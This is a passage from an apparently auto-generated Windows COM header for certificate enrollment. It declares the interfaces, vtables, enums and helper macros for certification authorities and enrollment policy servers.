            __RPC__in ICertificationAuthority * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificationAuthority * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificationAuthority * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Property )( 
            __RPC__in ICertificationAuthority * This,
            /* [in] */ enum EnrollmentCAProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue);
        
        END_INTERFACE
    } ICertificationAuthorityVtbl;

    interface ICertificationAuthority
    {
        CONST_VTBL struct ICertificationAuthorityVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificationAuthority_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificationAuthority_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificationAuthority_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificationAuthority_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificationAuthority_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificationAuthority_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificationAuthority_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificationAuthority_get_Property(This,property,pValue)	\
    ( (This)->lpVtbl -> get_Property(This,property,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificationAuthority_INTERFACE_DEFINED__ */


#ifndef __ICertificationAuthorities_INTERFACE_DEFINED__
#define __ICertificationAuthorities_INTERFACE_DEFINED__

/* interface ICertificationAuthorities */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificationAuthorities;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("13b79005-2181-11da-b2a4-000e7bbb2b09")
    ICertificationAuthorities : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthority **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICertificationAuthority *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ComputeSiteCosts( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthority **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertificationAuthoritiesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificationAuthorities * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificationAuthorities * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificationAuthorities * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificationAuthorities * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthority **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICertificationAuthorities * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICertificationAuthorities * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ __RPC__in_opt ICertificationAuthority *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICertificationAuthorities * This);
        
        HRESULT ( STDMETHODCALLTYPE *ComputeSiteCosts )( 
            __RPC__in ICertificationAuthorities * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthority **ppValue);
        
        END_INTERFACE
    } ICertificationAuthoritiesVtbl;

    interface ICertificationAuthorities
    {
        CONST_VTBL struct ICertificationAuthoritiesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificationAuthorities_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificationAuthorities_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificationAuthorities_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificationAuthorities_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificationAuthorities_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificationAuthorities_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificationAuthorities_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificationAuthorities_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICertificationAuthorities_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICertificationAuthorities_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICertificationAuthorities_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICertificationAuthorities_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICertificationAuthorities_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICertificationAuthorities_ComputeSiteCosts(This)	\
    ( (This)->lpVtbl -> ComputeSiteCosts(This) ) 

#define ICertificationAuthorities_get_ItemByName(This,strName,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByName(This,strName,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificationAuthorities_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0072 */
/* [local] */ 

typedef 
enum X509EnrollmentPolicyLoadOption
    {
        LoadOptionDefault	= 0,
        LoadOptionCacheOnly	= 1,
        LoadOptionReload	= 2,
        LoadOptionRegisterForADChanges	= 4
    } 	X509EnrollmentPolicyLoadOption;


enum EnrollmentPolicyFlags
    {
        DisableGroupPolicyList	= 0x2,
        DisableUserServerList	= 0x4
    } ;
typedef 
enum PolicyServerUrlPropertyID
    {
        PsPolicyID	= 0,
        PsFriendlyName	= 1
    } 	PolicyServerUrlPropertyID;

typedef 
enum X509EnrollmentPolicyExportFlags
    {
        ExportTemplates	= 0x1,
        ExportOIDs	= 0x2,
        ExportCAs	= 0x4
    } 	X509EnrollmentPolicyExportFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0072_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0072_v0_0_s_ifspec;

#ifndef __IX509EnrollmentPolicyServer_INTERFACE_DEFINED__
#define __IX509EnrollmentPolicyServer_INTERFACE_DEFINED__

/* interface IX509EnrollmentPolicyServer */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EnrollmentPolicyServer;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("13b79026-2181-11da-b2a4-000e7bbb2b09")
    IX509EnrollmentPolicyServer : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR bstrPolicyServerUrl,
            /* [in] */ __RPC__in BSTR bstrPolicyServerId,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ VARIANT_BOOL fIsUnTrusted,
            /* [in] */ X509CertificateEnrollmentContext context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE LoadPolicy( 
            /* [in] */ X509EnrollmentPolicyLoadOption option) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetTemplates( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplates **pTemplates) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCAsForTemplate( 
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthorities **ppCAs) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCAs( 
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthorities **ppCAs) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Validate( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCustomOids( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppObjectIds) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetNextUpdateTime( 
            /* [retval][out] */ __RPC__out DATE *pDate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetLastUpdateTime( 
            /* [retval][out] */ __RPC__out DATE *pDate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPolicyServerUrl( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPolicyServerId( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetFriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetIsDefaultCEP( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetUseClientId( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetAllowUnTrustedCA( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCachePath( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCacheDir( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetAuthFlags( 
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE SetCredential( 
            /* [in] */ LONG hWndParent,
            /* [in] */ X509EnrollmentAuthFlags flag,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE QueryChanges( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeImport( 
            /* [in] */ VARIANT val) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Export( 
            /* [in] */ X509EnrollmentPolicyExportFlags exportFlags,
            /* [retval][out] */ __RPC__out VARIANT *pVal) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Cost( 
            /* [retval][out] */ __RPC__out DWORD *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Cost( 
            /* [in] */ DWORD value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentPolicyServerVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EnrollmentPolicyServer * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EnrollmentPolicyServer * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EnrollmentPolicyServer * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ __RPC__in BSTR bstrPolicyServerUrl,
            /* [in] */ __RPC__in BSTR bstrPolicyServerId,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ VARIANT_BOOL fIsUnTrusted,
            /* [in] */ X509CertificateEnrollmentContext context);
        
        HRESULT ( STDMETHODCALLTYPE *LoadPolicy )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ X509EnrollmentPolicyLoadOption option);
        
        HRESULT ( STDMETHODCALLTYPE *GetTemplates )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplates **pTemplates);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAsForTemplate )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthorities **ppCAs);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAs )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthorities **ppCAs);
        
        HRESULT ( STDMETHODCALLTYPE *Validate )( 
            __RPC__in IX509EnrollmentPolicyServer * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetCustomOids )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppObjectIds);
        
        HRESULT ( STDMETHODCALLTYPE *GetNextUpdateTime )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out DATE *pDate);
        
        HRESULT ( STDMETHODCALLTYPE *GetLastUpdateTime )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out DATE *pDate);
        
        HRESULT ( STDMETHODCALLTYPE *GetPolicyServerUrl )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetPolicyServerId )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetFriendlyName )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetIsDefaultCEP )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetUseClientId )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetAllowUnTrustedCA )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCachePath )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCacheDir )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetAuthFlags )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *SetCredential )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ LONG hWndParent,
            /* [in] */ X509EnrollmentAuthFlags flag,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword);
        
        HRESULT ( STDMETHODCALLTYPE *QueryChanges )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeImport )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ VARIANT val);
        
        HRESULT ( STDMETHODCALLTYPE *Export )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ X509EnrollmentPolicyExportFlags exportFlags,
            /* [retval][out] */ __RPC__out VARIANT *pVal);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Cost )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out DWORD *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Cost )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ DWORD value);
        
        END_INTERFACE
    } IX509EnrollmentPolicyServerVtbl;

    interface IX509EnrollmentPolicyServer
    {
        CONST_VTBL struct IX509EnrollmentPolicyServerVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EnrollmentPolicyServer_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EnrollmentPolicyServer_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EnrollmentPolicyServer_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EnrollmentPolicyServer_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EnrollmentPolicyServer_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EnrollmentPolicyServer_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EnrollmentPolicyServer_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EnrollmentPolicyServer_Initialize(This,bstrPolicyServerUrl,bstrPolicyServerId,authFlags,fIsUnTrusted,context)	\
    ( (This)->lpVtbl -> Initialize(This,bstrPolicyServerUrl,bstrPolicyServerId,authFlags,fIsUnTrusted,context) ) 

#define IX509EnrollmentPolicyServer_LoadPolicy(This,option)	\
    ( (This)->lpVtbl -> LoadPolicy(This,option) ) 

#define IX509EnrollmentPolicyServer_GetTemplates(This,pTemplates)	\
    ( (This)->lpVtbl -> GetTemplates(This,pTemplates) ) 

#define IX509EnrollmentPolicyServer_GetCAsForTemplate(This,pTemplate,ppCAs)	\
    ( (This)->lpVtbl -> GetCAsForTemplate(This,pTemplate,ppCAs) ) 

#define IX509EnrollmentPolicyServer_GetCAs(This,ppCAs)	\
    ( (This)->lpVtbl -> GetCAs(This,ppCAs) ) 

#define IX509EnrollmentPolicyServer_Validate(This)	\
    ( (This)->lpVtbl -> Validate(This) ) 

#define IX509EnrollmentPolicyServer_GetCustomOids(This,ppObjectIds)	\
    ( (This)->lpVtbl -> GetCustomOids(This,ppObjectIds) ) 

#define IX509EnrollmentPolicyServer_GetNextUpdateTime(This,pDate)	\
    ( (This)->lpVtbl -> GetNextUpdateTime(This,pDate) ) 

#define IX509EnrollmentPolicyServer_GetLastUpdateTime(This,pDate)	\
    ( (This)->lpVtbl -> GetLastUpdateTime(This,pDate) ) 

#define IX509EnrollmentPolicyServer_GetPolicyServerUrl(This,pValue)	\
    ( (This)->lpVtbl -> GetPolicyServerUrl(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetPolicyServerId(This,pValue)	\
    ( (This)->lpVtbl -> GetPolicyServerId(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> GetFriendlyName(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetIsDefaultCEP(This,pValue)	\
    ( (This)->lpVtbl -> GetIsDefaultCEP(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetUseClientId(This,pValue)	\
    ( (This)->lpVtbl -> GetUseClientId(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetAllowUnTrustedCA(This,pValue)	\
    ( (This)->lpVtbl -> GetAllowUnTrustedCA(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetCachePath(This,pValue)	\
    ( (This)->lpVtbl -> GetCachePath(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetCacheDir(This,pValue)	\
    ( (This)->lpVtbl -> GetCacheDir(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetAuthFlags(This,pValue)	\
    ( (This)->lpVtbl -> GetAuthFlags(This,pValue) ) 

#define IX509EnrollmentPolicyServer_SetCredential(This,hWndParent,flag,strCredential,strPassword)	\
    ( (This)->lpVtbl -> SetCredential(This,hWndParent,flag,strCredential,strPassword) ) 

#define IX509EnrollmentPolicyServer_QueryChanges(This,pValue)	\
    ( (This)->lpVtbl -> QueryChanges(This,pValue) ) 

#define IX509EnrollmentPolicyServer_InitializeImport(This,val)	\
    ( (This)->lpVtbl -> InitializeImport(This,val) ) 

#define IX509EnrollmentPolicyServer_Export(This,exportFlags,pVal)	\
    ( (This)->lpVtbl -> Export(This,exportFlags,pVal) ) 

#define IX509EnrollmentPolicyServer_get_Cost(This,pValue)	\
    ( (This)->lpVtbl -> get_Cost(This,pValue) ) 

#define IX509EnrollmentPolicyServer_put_Cost(This,value)	\
    ( (This)->lpVtbl -> put_Cost(This,value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EnrollmentPolicyServer_INTERFACE_DEFINED__ */


#ifndef __IX509PolicyServerUrl_INTERFACE_DEFINED__
#define __IX509PolicyServerUrl_INTERFACE_DEFINED__

/* interface IX509PolicyServerUrl */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PolicyServerUrl;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("884e204a-217d-11da-b2a4-000e7bbb2b09")
    IX509PolicyServerUrl : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext context) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Url( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Url( 
            /* [in] */ __RPC__in BSTR pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Default( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Default( 
            /* [in] */ VARIANT_BOOL value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Flags( 
            /* [retval][out] */ __RPC__out PolicyServerUrlFlags *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Flags( 
            /* [in] */ PolicyServerUrlFlags Flags) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AuthFlags( 
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AuthFlags( 
            /* [in] */ X509EnrollmentAuthFlags Flags) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Cost( 
            /* [retval][out] */ __RPC__out DWORD *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Cost( 
